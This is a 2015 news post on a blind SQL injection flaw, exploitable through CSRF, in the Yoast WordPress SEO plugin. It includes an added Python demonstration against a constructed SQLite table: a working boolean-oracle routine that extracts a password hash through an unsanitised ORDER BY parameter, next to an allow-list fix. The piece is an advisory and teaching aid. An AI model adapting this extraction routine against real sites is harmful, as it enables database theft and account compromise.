Friday, 10 April 2015

Blind SQL Injection Vulnerability Discovered in WordPress SEO Plugin by Yoast

A blind SQL injection vulnerability was recently found in the popular WordPress SEO plugin by Yoast. The millions of WordPress sites that use this plug-in to improve their search engine rankings are at risk of being compromised.

The WordPress SEO plug-in, developed by the Dutch website optimization firm Yoast, contains a flaw that allows an attacker to manipulate a site's database, for example to add rogue administrator accounts. The vulnerability was discovered by Ryan Dewhurst, a security researcher and co-developer of the WPScan vulnerability scanner. It affects versions 1.7.3.3 and older of WordPress SEO by Yoast.

The flaw requires authentication to exploit, but the affected page has no cross-site request forgery (CSRF) protection, so an attacker can still exploit it by tricking an authenticated user with sufficient privileges (an administrator, editor or author) into clicking a specially crafted link or visiting a malicious page.
In a CSRF attack the victim's browser, while visiting a page controlled by the attacker, is made to send a request to a third-party site where the victim is already logged in, and that site carries out the unauthorized action with the victim's privileges. Websites therefore need an explicit defence that the attacker's page cannot reproduce, such as a per-request token (in WordPress, a nonce verified with check_admin_referer()).

The vulnerable code is in the file admin/class-bulk-editor-list-table.php. The orderby and order GET parameters are not sufficiently sanitized before being used in a SQL query. Because these parameters end up in the ORDER BY clause, a prepared-statement placeholder cannot protect them (placeholders bind values, not column names or the ASC/DESC keyword), so the only safe approach is to compare each one against a fixed list of allowed columns and sort directions before it reaches the query string.
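The following is an added example, not code from the Yoast plugin or from the WPScan advisory, illustrating both points above: the CSRF-delivered request and the unsanitized orderby/order parameters. It uses an in-memory SQLite database with a constructed three-row `users` table (the table, the `pass` column, the `list_logins_*` functions and the allow-lists are all assumptions made for the example) to show how an unrestricted ORDER BY clause becomes a boolean oracle that leaks a password hash one bit at a time, and how an allow-list closes it:

```python
import sqlite3

# Constructed sample data, not taken from the original page: a tiny "users"
# table standing in for the WordPress users table the real query reads from.
SAMPLE_ROWS = [
    (1, "admin", "$P$BadminHash"),
    (2, "editor", "$P$BeditorHash"),
    (3, "author", "$P$BauthorHash"),
]

# Hypothetical allow-lists used by the hardened version.
ALLOWED_ORDERBY = {"id", "login"}
ALLOWED_ORDER = {"ASC", "DESC"}


def make_db():
    """In-memory SQLite database populated with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, login TEXT, pass TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def list_logins_vulnerable(conn, orderby, order):
    """Bug class from the article: two GET parameters pasted straight into
    ORDER BY. A '?' placeholder cannot bind an identifier or the ASC/DESC
    keyword, so concatenation is the only way to build this clause, and
    nothing here restricts what the caller may concatenate."""
    sql = f"SELECT login FROM users ORDER BY {orderby} {order}"
    return [row[0] for row in conn.execute(sql)]


def list_logins_hardened(conn, orderby, order):
    """Same query, but both parameters are reduced to an allow-listed value
    before they touch the SQL string; unknown input falls back to a default
    instead of being passed through."""
    if orderby not in ALLOWED_ORDERBY:
        orderby = "id"
    order = order.upper()
    if order not in ALLOWED_ORDER:
        order = "ASC"
    sql = f"SELECT login FROM users ORDER BY {orderby} {order}"
    return [row[0] for row in conn.execute(sql)]


def _bsearch(oracle, expr, lo, hi):
    """Recover the integer value of SQL expression `expr`, known to lie in
    [lo, hi], asking the boolean oracle only questions of the form expr > mid."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"{expr} > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def blind_extract(conn, list_fn, target="admin", max_len=64):
    """Boolean-based blind SQL injection through the orderby parameter.
    The payload sorts by id when the injected condition is true and by -id
    when it is false, so the first login in the response leaks one bit.
    Returns the target's password hash, or None when the endpoint gives no
    usable oracle (which is what the hardened version does)."""
    first_by_id = SAMPLE_ROWS[0][1]

    def oracle(cond):
        payload = f"(CASE WHEN ({cond}) THEN id ELSE -id END)"
        return list_fn(conn, payload, "ASC")[0] == first_by_id

    # Sanity check before spending requests: a real oracle must answer
    # differently to a true and a false condition.
    if not (oracle("1=1") and not oracle("1=0")):
        return None

    sub = f"(SELECT {{}} FROM users WHERE login='{target}')"
    length = _bsearch(oracle, sub.format("length(pass)"), 0, max_len)
    chars = []
    for pos in range(1, length + 1):
        expr = sub.format(f"unicode(substr(pass, {pos}, 1))")
        chars.append(chr(_bsearch(oracle, expr, 0, 127)))
    return "".join(chars)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable :", blind_extract(db, list_logins_vulnerable))
    print("hardened   :", blind_extract(db, list_logins_hardened))
```

Two caveats worth keeping in mind. First, in a real WordPress plugin the equivalent of `list_logins_hardened` is to pass the parameter through `sanitize_sql_orderby()` or to compare it against the list table's own sortable columns, and to protect the page with a nonce (`check_admin_referer()`) so the request cannot be forged from another origin. Second, the oracle above reads the response, which an attacker's cross-origin page cannot do under the same-origin policy; exploitation delivered by CSRF therefore depends on a variant whose outcome is observable from outside, such as a time delay caused by the injected subquery.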

Immediate Update Advised

Users running an affected version should update immediately. If you use Jetpack to manage your sites, you can update quickly from https://wordpress.com/plugins/wordpress-seo, which lists every site where the plugin is installed and lets you update them all from one dashboard.

Hosting companies are scrambling to protect their customers. One host's status blog published an advisory on the vulnerability and is updating installations where the plugin is active: "Our systems have already begun updating this plugin across all impacted sites on our systems, and we expect this process to be completed shortly".

The same company has also added rules to its web application firewall (WAF) to filter incoming requests that attempt to exploit the vulnerability. A WAF rule is a stopgap that buys time; it does not replace updating the plugin.
